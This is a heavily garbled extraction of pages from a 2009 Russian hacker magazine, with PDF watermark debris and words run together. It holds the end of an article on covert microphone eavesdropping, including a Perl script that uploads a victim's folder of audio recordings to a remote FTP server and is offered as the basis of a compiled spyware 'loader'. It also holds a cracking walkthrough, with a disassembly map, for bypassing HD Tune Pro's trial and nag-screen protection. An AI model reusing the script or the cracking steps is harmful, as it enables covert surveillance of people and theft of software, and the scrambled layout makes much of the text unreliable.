книги хакеры / журнал хакер / 129_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
ЗАБИРАЕМ НАЖИТОЕ :)
ярешилнемногоупроститьтвоюзадачу, выложивчасть |
close LFILE; |
своегоPerl-сорца: |
closedir LDIR; |
|
$ftp->quit(); |
#!/usr/bin/perl |
|
|
#print "================================== =\n";
#print "= Small FTP Loader = ";
#print "================================== =\n";
use Net::FTP;
$ftp_server = "blablabla.com"; #FTP-сервер $ftp_user = "user"; #логин на ftp-сервер $ftp_pass = "password"; #пароль на ftp-сервер
$ftp = Net::FTP->new("$ftp_server", Passive => 1);
$ftp->login("$ftp_user", "$ftp_pass"); $ftp->cwd('/domains/blablabla.com'); $ftp->binary(); $ftp->mkdir("/domains/blablabla.com/logs"); opendir(LDIR, "C:\\каталог_с_ аудиофайлами\\");#открываем каталог с аудиофайлами
$count=1;
while($filename = readdir LDIR){ if($count>2){ $ftp->put("C:\\каталог_с_
аудиофайлами\\$filename","/domains/ blablabla.com/logs/$filename"); #передаем все аудиофайлы из каталога на наш FTP-сервер
}
$count++;
}
Скрипт довольно прост и позволяет лишь копировать все содержимое конкретного каталога на удаленный FTP-сервер. Однако, модернизировав его и скомпилив в exe-файл (например, при помощи Perl2Exe), ты получишь простенький лоадер с вполне рабочим функционалом.
В общем, все зависит исключительно от тебя, твоих целей и средств (наличия прямых рук и светлой головы). Существует множество способов реализации «компьютерной» прослушки; я уже молчу о КПК, ведь софт под мобильные платформы никто не отменял, правда? А с наличием микрофонов на всех коммуникаторах и смартфонах проблем точно нет... но это уже совсем другая история.
НЕБОЛЬШОЙP.S.
Встатьеясознательнонесталраскрыватьвсеподробностиорганизациипрослушкивпланетарныхмасштабах, и томуестьнесколькопричин. Во-первых, подобныедействиячеткорегулируютсязаконодательством, аво-вторых, сутьвдругом. Яхотел, чтобытыпонял, насколькоуязвим каждыйизнасвповседневнойжизни, ипредпринялмеры пообеспечениюсобственнойбезопасности, — контролировалвсезвукозаписывающиеизвукопередающие устройствавимеющейсяутебятехнике. Конечно, об отключениимикрофонавтвоеммобильникеречинеидет, носкомпомвсегораздопроще:). Жертвовать ли удобством ради безопасности — решать тебе, но я надеюсь, ты сделаешь правильный выбор.z
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
INFO |
info
Незабывайособственнойбезопасностиипомни, чтолюбой компьютероподобный девайсможетбыть использованвкачествесредстваскрытой звукозаписи!
DVD |
dvd
УтилыMicSpy иMicSpy++ ты
найдешьнанашем диске. Кпервойиз нихдажеприлагаютсясорцы.
WARNING |
info
Внимание! Информацияпредставлена исключительно сцельюознаком-
ления! Ниавтор, ни редакциязатвои действияответственностиненесут!
XÀÊÅÐ 09 /129/ 09 |
069 |
070
09 /129/ 09 ÐÅÊÀX
|
|
|
|
|
|
|
|
|
|
|
00433020 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
4330FA |
GetSystemtimeToFille |
|
|
|
|
|
|
|
|
|
|
|
|
|
43310A |
GetSystemtimeToFille |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
433129 |
CALL 0043326F [обработка файлов] |
||||
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
433274 |
|
|
|||
|
|
|
|
|
|
|
|
|
-------- |
[сколько осталось наших триал дней] |
||||
|
|
|
|
|
|
|
|
|
|
|
|
4332B3 |
JNE SHORT 0043330C |
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
4332B2 |
MOV ESI, OFFSET TRIAL PERIOD EXPIRED |
|
004157DB |
|
|
JMP 00415880 |
45F663 |
433302 |
CALL 004108D0 |
||||||||
|
|
|
|
|
43330A |
JMP SHORT 00433328 |
||||||||
|
|
|
w |
w |
|
|
D |
||||
w |
|
|
|
|
|
P |
|
|
|
|
|
|
|
|
|
|
F |
||
. |
|
|
|
|
|
|
|
||
p |
Click |
|
|
|
|
|
- |
||
f |
|
|
|
|
|
X |
|||
d |
|
|
|
|
|
|
|
|
|
- |
|
|
to |
|
|
|
|
C |
|
x |
|
|
|
|
|
|
h |
||
c |
|
|
|
BUY |
|
|
|
|
a |
h |
|
|
|
|
|
|
|
n |
|
a |
|
|
|
|
|
|
|
|
g |
n |
|
|
|
|
NOW! |
|
e |
||
|
|
|
|
|
|
|
|
E |
|
g |
|
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
|
|
|
d |
. |
|
|
|
|
|
|
|
|
i |
c |
|
|
|
|
|
|
|
||
o |
|
|
|
|
|
|
t |
||
|
m |
|
ВЗЛОМ |
|
r |
o |
|
||
|
|
MAKTRAXEP |
|
|
|
|
|||
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
GreateWindowExA |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
0043330C |
LEA EDX,[ESP+60] |
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
433310 PUSH EDX DAY(S) LEFT |
|||||
415821 |
|
|
[Начало] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
RETRN |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
433320 |
CALL 0043C57A |
|||||||||||||||||||
|
415880 |
Push 58/Call 00462485 |
|
|
|
|
00461CC9 |
|
|
|
|
|
|
462982 |
|
|
SEH |
|
|
|
|
|
|
00433328 |
LEA ECX,[ESP+0A0] |
|||||||||||||||||||||||
|
4158EB |
Call 0045C516 [ создаем 2е окно-NAG] |
|
|
|
text=ECX,hWnd=ECX+1C |
462987 |
CALL 0043E58D |
|
|
0043E58D |
|
|
|
|
433336 |
CALL 00463355 ARG= или |
|||||||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Instal SE Handler |
|
|
|||||||||||||||||||||||
|
415A43 |
Push EXC(ESP+90)/ CALL 00461CC9 забиваем в кепшн |
SetWindowTextA |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
433388 CALL 00463355 Unregisted Trial Version |
||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
главного "Trial |
|
|
RETRN |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
HDD & NAG |
|
|
|
|
|
4629ED |
CALL 00462906 |
|
|
|
retrn |
|
|
|
|
|
|
|
|
|
|
retrn |
||||||||||||||||||||
|
415ABE |
Call 00415D30 |
Version" |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||
|
|
|
|
|
|
00415D30 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
00462906 |
|
|
0046911D |
|
|
GetParent |
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
[Появляется |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
415D59 |
|
|
|
|
|
4629E2 |
MOV DWORD PTR |
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
EnabledWindow (TRUE/FALSE) |
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
кепшн главного |
|
|
|
|
|
SS:[EBP-14],EAX |
46292E |
CALL 0046911D |
|
|
|
|
GetWindowLongA |
|
|
|
|
|
|||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
окна] |
|
|
|
|
|
|
[меняется место |
|
|
|
|
|
|
|
|
|
|||||||||||||||||
|
415ACF |
CMP EAX,EDI |
|
|
|
|
|
|
|
|
|
|
462936 |
CALL 045F28E |
|
|
|
|
retrn |
|
|
|
|
|
||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
хэндла главного |
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
415AD1 |
JL 00415C21 |
415D8A |
CALL 0040FD60 [поверхностно-атрибуты HDD] |
|
|
|
|
|
|
|
|
retrn |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||
|
|
|
|
|
|
в стеке] |
|
|
|
045F28E |
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||
|
415AD7 |
JG SHORT 00415AE5 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
id текущего |
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
415DDE |
|
[ESP+18] |
|
|
|
|
|
462A07 |
IsWindowsEnabled? [EBN-14] |
|
потока |
|
|
|
|
GetCurrentThreadid |
|
|
|
|
|
||||||||||||||||
|
|
[ EAX > EDI: если нет |
|
GetSystemTime |
|
|
|
|
|
|
|
|
|
|
|
|
|
(main) |
|
|
|
|
retrn |
|
|
|
|
|
||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
проблем с триал |
415E66 |
|
CreateFileA |
|
|
|
|
|
[IF EAX вернет 1 then...] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||
|
|
периодом т. е. выпол- |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
|
|
нится JG] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
462A15 |
EnableWindow (FALSE) [EBP-14] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
41600D |
|
CALL 0040F650 [тип шины, имя/размер HHD] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
TEST AL, AL, [Фильтруем:Только HDD/Flash] |
|
|
|
4623A3A |
CALL 00462693 |
|
|
|
|
|
|
|
|
|
00462693 |
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
JE 004160F8 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
462A38 |
CMP EAX,EDI EDI=1 / EAX=1 or 0 |
|
|
|
|
|
|
|
|
|
|
4624E1 CALL 00433020 (EDX+0BCh) |
||||||||||||||||
|
|
|
|
|
|
AL=0 |
|
|
4160BE |
|
SendMessageA [забиваев в ComboBox] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
id носителя |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
462A41 |
JE SHORT 00462A95 True-прыгаем |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
не есть HDD/ |
|
4160DE |
|
CALL 004121F0 [продолжаем |
|
|
|
|
|
через фунцию показа NAG |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||
|
|
|
|
|
|
Flash |
|
|
|
|
|
|
462A5E |
CALL 004615C9 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
инициализацию HHD] |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
retrn |
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
n.a.g. |
CMP DWORD PTR DS:[ESI+1C],EDI |
|
[возвращаемся к EBP-14] |
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
4160F8 |
|
CMP EBP,5 |
|
|
JE SHORT 00462A95 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
|
|
|
|
|
не прыгаем |
|
|
|
|
|
|
|
|
JNE SHORT 00416114 |
|
|
|
004615C9 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
[НАГлое окошко ] |
|
|||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
4615FA |
GetParent (ESI+1C) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
только на 5м |
41610D |
|
CALL 00406930(1F, "Error get |
|
|
|
|
|
|
|
|
|
|
0461DE5 |
|
|
|
|
|
|
|
||||||||||||||||||||||
|
|
|
|
|
|
заходе |
|
|
|
|
|
disk info") |
|
461610 |
UpdateWindows |
|
|
|
|
|
|
|
|
|
|
ShowWindow [EXC+1C] |
||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
00416114 |
CMP EBP,0C [12 в десятичной] |
|
461630 |
CMP DWORD PTR SS:[ESP+10],EDI |
[попрыгаем |
retrn |
|
|
|
JNE SHORT 00416143 |
[готовим |
461634 |
JE SHORT 00461648 |
и покажем |
|
|
на 12м заходе |
|
|
|
|||||
|
|
NAG] |
46163A |
CALL 00461DE5 |
окошко] |
|
|
|
во владения |
416125 |
CALL DWORD PTR DS: [EAX+088] |
|
|
||||
|
46163F |
PUSH DWORD PTR |
|
|
|
|||
NAG |
|
INC EBP; CMP EBP, 10; [ESP+10]=EBP |
|
DS:[ESI+1C] |
|
|
|
|
|
|
|
[кинем хенл NAG на вершину стека] |
|
|
|
||
|
|
JL 00415DC6 [цикл, выполнится 16 |
|
|
|
|
||
|
|
|
|
|
|
|
||
|
|
раз..] |
|
4616C2 |
CALL 00461DE5 |
[запасной вызов NAG, на всякий |
|
|
|
|
MOV EAX ,DWORD PTR DS:[EBX+256A8] |
|
|
00462A95 |
OR DWORD PTR SS:[EBN-4], FFFFFFFF |
||
|
|
|
|
пожарный ] |
||||
|
|
TEST EAX,EAX |
|
|
|
|||
|
|
|
|
RETRN |
|
|
CMP DWORD PTR SS: [EBP-20],EDI |
|
|
|
JL SHORT 00416170 |
|
|
|
462A9C |
||
|
|
MOV EAX,DWORD PTR DS:[EBX+0F14] |
|
|
|
JE SHORT 00462AA9 |
||
|
|
|
|
|
|
EnabledWindows (handle=[EBP-14]) |
||
|
|
TEST EAX,EAX |
|
|
|
|
|
|
|
|
|
|
|
|
00462AA9 CMP DWORD PTR SS:[EBP-20],EDI |
||
|
|
JG SHORT 00416184 |
|
|
|
|
||
|
|
|
|
|
|
462AAC |
JE SHORT 00462AC2 |
|
|
|
JL SHORT 00416170 |
|
|
|
|
||
|
|
|
|
|
|
|
GetActiveWindow (handle=[EBP-14]) |
|
|
|
CMP DWORD PTR DS:[EBX+0F10],1 |
|
|
|
|
||
|
|
|
|
|
462AB7 MOV EAX,DWORD PTR DS:[ESI] |
|||
|
|
JNB SHORT 00416184 |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
MOV EAX,DWORD PTR DS:[EBX] |
|
|
|
00462AC2 |
|
|
|
|
MOV ECX,EBX |
|
|
|
|
|
|
|
|
|
|
|
|
|
retrn |
|
|
|
CALL DWORD PTR DS:[EAX+0CB] (00417E70) |
|
|
|
|
||
|
|
|
|
[оперируем с реестром ] |
|
|
||
|
|
MOV DWORD PTR DS:[EBX+256A8],0 |
|
|
|
|
RETRN |
4108D0 |
ww |
w |
|
|
|
P |
|
|
|
RegOpenKey-RegCloseKey |
|
|
|
D |
||||||
|
|
|
|
|||||||
|
. |
|
|
|
|
|
|
F |
||
|
|
p |
|
|
|
|
|
|
|
- |
|
|
f Click |
|
|
|
|
|
X |
||
|
|
d |
|
|
|
|
|
|
|
C |
|
|
- |
|
to |
|
|
|
|
||
|
|
x |
|
|
|
|
|
h |
||
|
|
h |
|
|
BUY |
|
|
|
a |
|
|
|
c |
|
|
|
|
|
|
|
n |
|
|
a |
|
|
|
|
|
|
|
g |
|
|
n |
|
|
|
NOW! |
|
e |
||
|
|
|
|
|
|
|
|
|
E |
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
|
|
d |
|
|
. |
|
|
|
|
|
|
|
i |
|
|
c |
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
t |
|
|
|
m |
|
|
|
r |
o |
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
t |
|
||
P |
D |
|
|
|
|
|
|
|
o |
|
|
|
|
|
NOW! |
r |
|||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
m |
|
w Click |
|
|
|
|
|
|
||||
|
w |
|
|
|
|
|
|
ХАРДКОРНЫЙ |
||
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
||
|
|
|
df |
|
n |
e |
|
|||
|
|
|
|
-xcha |
|
|
|
|
ТЮНИНГ
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ИсследованиезащитыHDTunePRo
Наконец-торазработчикисофтасталиприслушиватьсякхакерам! Примитивныемодулипроверкирегистрациипостепенноуходят впрошлое. Протекторы, запутанныйиразбросанныйкодмодуля проверки, неявныевызовыпроцедур, громадноеколичествовызо-
вов, проверкафлагатрассировкииижесними. Этолишьпримерный списокинструментов, спомощьюкоторыхразработчикистроят, поих выражению, мощныеинепробиваемыезащиты! Нозачастуюреалии
далекиотсовершенства. Смотрисам.
|
КАРТАПРОГРАММЫ: |
|
|
|
днейдоокончания |
00410B32 ипоследний— передвсплытием |
|
|
|
|
|
||||
|
|
|
|
|
|
триалпериода), |
NAG (адресостановкибудет00410С0F). После |
|
|
|
|
|
|
||
|
ÍD TUNE PRO 3.50 |
|
TRIAL VER, 15 DAYS, NAG |
|
авглавномокне |
нажатия«ОК» (вслучаеокончаниятриала) |
|
|
|
|
|
|
|
программыкрасу- |
действияповторяются. Гм! Теоретическимы |
|
(C) ELF, ICQ: 7719116 & CJ, ICQ: 3708307 |
|
етсязаголовокTrial |
стобоймоглибывзятьсязаразборименно |
|||
|
Использовать только в познавательных целях! |
|
version. Вобщем, |
сэтогоместа, но, забегаявперед, скажу, что |
|||
|
|
|
|
|
|
надеждынабыстрый |
этолишьшестеренкавбольшойсистеме. Нам |
|
|
|
|
|
|
взломнет. Этовамне |
важнобыстреньковосстановитьвесьмеханизм |
|
|
|
|
|
|
||
|
|
|
|
|
|
MessageBox! :). |
отначалаидоконца. |
|
адумайся— многолиможнополучить, |
Послепереводадатынатриднявпередпро- |
ИНЪЕКЦИЯБРЯКОВ |
||||
|
сломавпрогуправкойодногобайта, |
граммапосчитала, что15 днейпрошлоидаже |
|||||
|
особенноеслиэтоправкавстиле |
послеустановкилегальнойдатыяоказался |
НадоискатьAPI, котораяответственназа |
||||
З«условныйпереходнабезусловный»? |
соконченнымтриал-перидом. Мониторинг |
созданиесамогоокнаNAG. |
|||||
Наверняка, нет! Итакихпрограмм(какирас- |
обращенийкрееструифайламтакженепринес |
Перебираемнаиболееподходящиевспис- |
|||||
тяп-программистов) большинство. Возникает |
весомогорезультата— программаобращается |
кеимпорта: CreateDialog сDialogBox. Таких |
|||||
ощущение: содружествопрограммистовдавно |
кслишкомбольшомуколичествуэлементови |
нет! Значит, естьчто-тодругое. Окна, окна... |
|||||
принялотакойподходкакмеждународный |
анализироватьихутомительно. |
Windows, CreateWindowExA (исходяизна- |
|||||
стандарт! Нанашесчастьепопадаютсяисклю- |
Ладно, каквидноизPEiD, ничегострашногоиз |
звания, родственныеейAPI — ShowWindow, |
|||||
чения, когдавреализациизащитывстречают- |
протекторовнаснеожидает. Чтож, уженемного |
EnableWindow, SetWindowTextA). А, вот, такая |
|||||
сяпросветыкреативныхмыслей. Дабыпомочь |
легче! ЗапускаемOllyDbg, грузимhdtunepro. |
есть! Основнойвызовв0045F701 скучейпара- |
|||||
восвоенииприемовпротивостоянияболее |
exe. Дляпущейубедительностивотсутствии |
метров. Здесьжевидимадрессамойфункции, |
|||||
сложнымтехникамзащиты(вособенности, |
антиотладкизапустимнавыполнение. Видим, |
втелекоторойвызов— 0045F663. Естьсемь |
|||||
быстромуисследованию), предлагаюокунуться |
чтовсеработает! Теперьглавныйвопрос— с |
мест, откудаонабудетвызвана. Чтобыузнать, |
|||||
вэтисамыеэлементыкреативноготворчества. |
чегоначать? Первое, чтопришловголову— |
ктовызываетнашуфункцию, покаждомуместу |
|||||
ВЫБОРЖЕРТВЫ |
|
повторитьпримервзломаWinRAR 3.42 виспол- |
вызоваможнопоставитьбряк. |
||||
|
ненииКрисаКасперски. Сутьметодазаклю- |
Попробуйпротрассируйиубедишься, что |
|||||
НетсмыслаописыватьсамупрогуHdTunePro |
чаласьвподавленииNAG припомощиправки |
функцияCreateWindowExA будетвызванадва |
|||||
3.50 — выборпродиктованлишьцелью |
|
инструкциисравненияреальногоколичества |
раза. Первыйразтыувидишьокновверхнем |
||||
исследованиязащиты. Дляначалапримерно |
днейсчислом40. Внашемслучаеавторыока- |
левомуглумонитораснулевойширинойи |
|||||
определимся, счеммыимеемдело. Некоторые |
залисьлюдьмижадными, ичислотаких дней |
длиной(возможно, этоглавноеокнопрограм- |
|||||
сейчасжескажут, чтонужновзятьPEiD ипро- |
будет15. Тоесть, надонайтиинструкциюcmp |
мы, котороепотомпринадобности, аточнее, |
|||||
веритьфайлнаупакованность— это, конечно, |
eax, 0Fh (число15 вhexе— этоF), котораянаси |
приотсутствииунаспроблемстриалпериодом, |
|||||
верно, нонесовсем! |
|
выведеткNAG. Находимиставимбряки, ведь |
будетустановленовнормальныйрежим). Авот |
||||
Сперванеобходимопростозапуститьиспол- |
ихбольшечемодна(вообще, уменяих11). |
второеокошко— этосозданиеNAG. Вовсяком |
|||||
няемыйфайлиповерхностнопроанализиро- |
Вмоемслучаепервыйбряксработалпоадресу |
случае, оченьпохоже. Восстановимцепочку |
|||||
ватьпринципработырегистрации. Создается |
00410A55, значениерегистраeax возрастает |
всеговызоваспомощьюинъектабряков— на |
|||||
окошко, вбиваютсязначения(сколькоосталось |
отнулядопятнадцати; затембрякпоадресу |
каждомлокальномвызовефункцииA поставим |
XÀÊÅÐ 09 /129/ 09 |
071 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
to |
BUY |
|
|
|
|
|
ВЗЛОМ |
w Click |
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
DVD |
dvd
НанашемDVD-но- сителележиткарта… нет, незабытых пиратскихсокровищ! Картаосновных действийпрограммы, связанныхтриалпериодом, ипос-
ледняянаданный
моментверсия ТРАССИРОВКАСУСЛОВИЕМ НЕХИТРЫЙТРЮКСТРИАЛОМ
OllyDbg.
HTTP://WWW
links
www.hdtunepro. com — сайтнашего пациента. www.ollydbg.de
— сайтотладчика
OllyDbg.
INFO |
info
•Незабывайприиньектебряковписатьв комментариях, зачем ониздесьнужны— иначелегкозапутаться!
•Впрогах, наподобие нашейисследуемой, постарайсянайти начало(инициализациюформы) иконец (собственноNAG). Анализсерединыи окрестностейдажес неявнымивызовами будетнамноголегче.
•Держинастолебумагуиручку— составлятькартыпрограммы необходимодлянормальноговосприятия еедействий, атакже длявбыстрогопоиска нужноготебеадреса.
бряк. Запускаемпрограмму, гдебряксработал, смотрим |
заменитьcaption? |
теловызвавшейфункцииB иеелокальныевызовы. Также |
Такчто— идемдалее! Адалееидеттривиальныйвызов |
